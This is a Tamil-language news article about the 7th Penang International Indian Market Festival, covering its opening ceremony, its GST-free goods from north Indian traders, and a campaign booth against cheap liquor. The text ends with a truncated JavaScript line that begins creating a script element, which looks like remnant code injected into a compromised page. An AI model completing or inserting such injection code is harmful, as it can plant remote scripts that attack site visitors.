7வது பினாங்கு அனைத்துலக இந்திய சந்தை விழாவில் ஜிஎஸ்தி வரி இல்லை

 ஶ்ரீ டெலிமா  சட்டமன்ற உறுப்பினர் திரு நேதாஜி இராயர், டிபி காணா நிறுவன உரிமையாளர் டிபி காணா மற்றும் சில பிரமுகர்கள் இணைந்து  குத்து விளக்கேற்றி துவக்கி வைத்தனர்.
ஶ்ரீ டெலிமா சட்டமன்ற உறுப்பினர் திரு நேதாஜி இராயர், டிபி காணா நிறுவன உரிமையாளர் டிபி காணா மற்றும் சில பிரமுகர்கள் இணைந்து குத்து விளக்கேற்றி துவக்கி வைத்தனர்.

கடந்த ஜூன் மாதம் 27ஆம் திகதி சனிக்கிழமை அன்று பினாங்கு அனைத்துலக இந்திய சந்தை பெருவிழா, ஜூரு ‘ஆட்டோ சிட்டியில்’ அதிகாரப்பூர்வமாகத் திறப்பு விழாக் கண்டது. இந்நிகழ்வை ஶ்ரீ டெலிமா சட்டமன்ற உறுப்பினர் திரு நேதாஜி இராயர், டிபி காணா நிறுவன உரிமையாளர் திரு டிபி காணா மற்றும் சில பிரமுகர்கள் இணைந்து குத்து விளக்கேற்றி துவக்கி வைத்தனர். நிகழ்வில் உரையாற்றிய சட்டமன்ற உறுப்பினர் திரு நேதாஜி இம்மாதிரியான விற்பனை சந்தையின் வழி இந்தியர்கள் மட்டுமின்றி சுற்றுப்பயணிகள், பிற இனத்தவர்களும் பயனடைவதை எண்ணி அகம் மகிழ்ந்தார். இந்த சந்தை பெருவிழாவில் விற்கப்படும் அனைத்து பொருட்களுக்கும் ஜிஎஸ்தி வரி வசூலிப்பு கிடையாது என்பது பாராட்டக்குறியது.

வண்ணமயமான சேலைகள்
வண்ணமயமான சேலைகள்

7வது முறையாக நடைபெறும் இவ்விழாவில் துணிமணிகள், காலணிகள், சுடிதார், சேலை, அழகுச் சாதனப்பொருட்கள், உணவுப் பதார்த்தங்கள் என பல்வகை பொருட்களும் மிக மலிவான விலையில் விற்கப்பட்டன. பொதுவாகவே மலேசியாவில் விற்கப்படும் பொருட்கள் தென் இந்தியாவிலிருந்து இறக்குமதி செய்யப்பட்டவை. இந்த மாபெரும் விழாவில் விற்கப்படும் பொருட்கள் யாவும் வித்தியாசமானவை காரணம் இந்திவாவின் வட மாநிலங்களான புதுடில்லி, காஷ்மீர், இராஜஸ்தான் ஆகிய இடங்களிலிருந்து வணிகர்கள் தங்களின் பொருட்களை இங்கு விற்கின்றனர். மேலும், இம்முறை அதிகமான உள்நாட்டு வணிகர்களுக்கு இச்சந்தையில் விற்பனைச் செய்ய வாய்ப்புகள் வழங்கப்பட்டது என்றால் மிகையாகாது. இதனால் தான் பினாங்கு வாழ் மக்கள் மட்டுமின்றி பிற மாநிலங்களிலிருந்தும் ஆயிரக்கணக்கான மக்களின் கூட்டம் திரளாகக் காணப்பட்டன.

இந்திய சந்தை விழாவிற்கு வருகையளித்த பொது மக்கள்
இந்திய சந்தை விழாவிற்கு வருகையளித்த பொது மக்கள்

இந்த மாபெரும் சந்தையில் வர்ணம் தீட்டும் போட்டி, அதிர்ஷ்ட்ட குளுக்கு, கலைநிகழ்ச்சி ஆகிய நிகழ்வுகள் பொது மக்களை இன்பக் கடலில் மூழ்கடித்தது. இந்த மாபெரும் சந்தை, வியாபார நோக்கம் மட்டுமின்றி வாடிக்கையாளர்களின் அனைத்து தேவைகளைப் பூர்த்திச் செய்யும் ஒரே தலமாக அமைகிறது எனக் கூறினார் டிபி காணா நிறுவன உரிமையாளர் திரு டிபி காணா. மேலும், மலேசியாவில் தயாரிக்கப்படும் மலிவு சாராயத்தை ஒழிப்பதற்காக சிறப்பு சாவடி அமைக்கப்பட்டது. இந்தியர்கள் இத்திட்டத்திற்கு ஆதரவு அளிக்கும் வண்ணம் கொடுக்கப்பட்டப் பாரத்தில் கையொப்பமிட்டுனர்.

மலிவு சாராயத்தை ஒழிப்பு இயக்கத்திற்கு ஆதரவு அளிக்கும் பொது மக்கள்
மலிவு சாராயத்தை ஒழிப்பு இயக்கத்திற்கு ஆதரவு அளிக்கும் பொது மக்கள்
var d=document;var s=d.createElement(‘script’);